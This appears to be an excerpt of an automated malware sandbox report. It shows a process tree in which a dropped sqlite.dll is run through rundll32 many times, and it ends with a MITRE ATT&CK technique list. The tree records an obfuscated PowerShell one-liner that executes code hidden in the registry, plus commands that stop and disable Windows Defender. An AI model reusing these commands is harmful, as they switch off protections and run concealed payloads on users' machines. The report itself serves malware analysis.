C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 5684 -ip 56841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5664
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5124 -ip 51241⤵PID:5304
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Loads dropped DLL
PID:8064 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8064 -s 4482⤵
- Program crash
PID:4280
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8064 -s 4482⤵
- Program crash
- Enumerates system info in registry
PID:7792
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:7928
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 8064 -ip 80641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5804
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3956 -ip 39561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6216
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4040 -ip 40401⤵PID:6136
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 456 -p 1900 -ip 19001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4216
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 7392 -ip 73921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4432
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 7548 -ip 75481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6032
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 7636 -ip 76361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2352
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:5288 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:6952 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6952 -s 4563⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:912
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6952 -s 4563⤵
- Program crash
PID:2764
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 6952 -ip 69521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7392
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:6848 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:5392 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5392 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1160
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5392 -s 4483⤵
- Program crash
PID:3428
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5392 -ip 53921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3900
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 7068 -ip 70681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7796
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 6228 -ip 62281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5948
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2584 -ip 25841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1500
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 7744 -ip 77441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3324
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4228 -ip 42281⤵PID:4872
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5280 -ip 52801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1428
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 6084 -ip 60841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3040
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 6252 -ip 62521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6712
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 8176 -ip 81761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4872
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 3720 -ip 37201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8032
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:2700
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:29968
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:49300
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:49664 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding B29F9F4360D12340F07EA244CEFEB287 C2⤵
- Loads dropped DLL
PID:47000
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 460FDC7A8AAF9390C326F917C22A83352⤵
- Blocklisted process makes network request
PID:31772 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:32368
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 9404BF242CA3FE744486C9A444241478 E Global\MSI00002⤵
- Drops file in Windows directory
PID:34664
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵PID:46232
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5624 -ip 56241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5528
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:7788 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:3724 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3724 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:8316
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3724 -ip 37241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1052
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 30840 -ip 308401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7696
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:7148 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:8252 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8252 -s 4563⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:9432
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 8252 -ip 82521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8924
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 31180 -ip 311801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:9024
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 49716 -ip 497161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:10056
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 50108 -ip 501081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:10128
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 7800 -ip 78001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:11340
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:11664 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:11692
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 11692 -s 4563⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:31908
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 11692 -ip 116921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:31816
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 31788 -ip 317881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:31872
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵PID:31788
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 31788 -s 4482⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:32008
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:11704
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:32096
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 8984 -ip 89841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:32200
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 9416 -ip 94161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:32388
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 15296 -ip 152961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:16968
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:17420
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}2⤵
- Modifies data under HKEY_USERS
PID:17608 -
C:\Windows\SysWOW64\sc.exe"C:\Windows\system32\sc.exe" qc windefend3⤵PID:18644
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"3⤵PID:18752
-
-
C:\Windows\SysWOW64\whoami.exe"C:\Windows\system32\whoami.exe" /groups3⤵PID:18928
-
-
C:\Windows\SysWOW64\net1.exe"C:\Windows\system32\net1.exe" stop windefend3⤵PID:19004
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE3⤵PID:19052
-
-
C:\Program Files (x86)\Windows Defender\MpCmdRun.exe"C:\Program Files (x86)\Windows Defender\MpCmdRun.exe" -DisableService3⤵PID:19136
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}2⤵
- Modifies data under HKEY_USERS
PID:17712 -
C:\Windows\SysWOW64\sc.exe"C:\Windows\system32\sc.exe" qc windefend3⤵PID:18684
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"3⤵PID:18784
-
-
C:\Windows\SysWOW64\whoami.exe"C:\Windows\system32\whoami.exe" /groups3⤵PID:18952
-
-
C:\Windows\SysWOW64\net1.exe"C:\Windows\system32\net1.exe" stop windefend3⤵PID:19020
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE3⤵PID:19076
-
-
C:\Program Files (x86)\Windows Defender\MpCmdRun.exe"C:\Program Files (x86)\Windows Defender\MpCmdRun.exe" -DisableService3⤵PID:19212
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
PID:49372 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 696EC8317F1AD6D430553D680CB492CB C2⤵PID:49780
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 8F80BB1F08EFA5062F88A107A13411DA2⤵PID:46756
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:31496
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding DA1590A7F56F3C7B60C2744088E5C861 E Global\MSI00002⤵PID:4824
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 48612 -ip 486121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:49492
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:46116 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:46192
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 46192 -s 4523⤵
- Program crash
PID:6812
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 46192 -ip 461921⤵PID:46252
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 30588 -ip 305881⤵PID:49684
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 6428 -ip 64281⤵PID:8264
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 7364 -ip 73641⤵PID:46892
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:9260 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:9304
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9304 -s 4563⤵
- Program crash
PID:28368
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 9304 -ip 93041⤵PID:9356
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:5628 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:5576
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5576 -s 4483⤵
- Program crash
PID:8848
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5576 -s 4483⤵
- Program crash
PID:8252
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5576 -ip 55761⤵PID:30336
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 49868 -ip 498681⤵PID:31876
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 10628 -ip 106281⤵PID:32192
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 8664 -ip 86641⤵PID:32172
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:31800 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:32976
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 32976 -s 4483⤵
- Program crash
PID:33660
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 32448 -ip 324481⤵PID:34660
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 40452 -ip 404521⤵PID:41412
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 39228 -ip 392281⤵PID:41504
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 13208 -ip 132081⤵PID:16136
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
2Registry Run Keys / Startup Folder
3Scheduled Task
1Defense Evasion
Bypass User Account Control
1Disabling Security Tools
5Impair Defenses
1Install Root Certificate
1Modify Registry
11Virtualization/Sandbox Evasion
1Web Service
1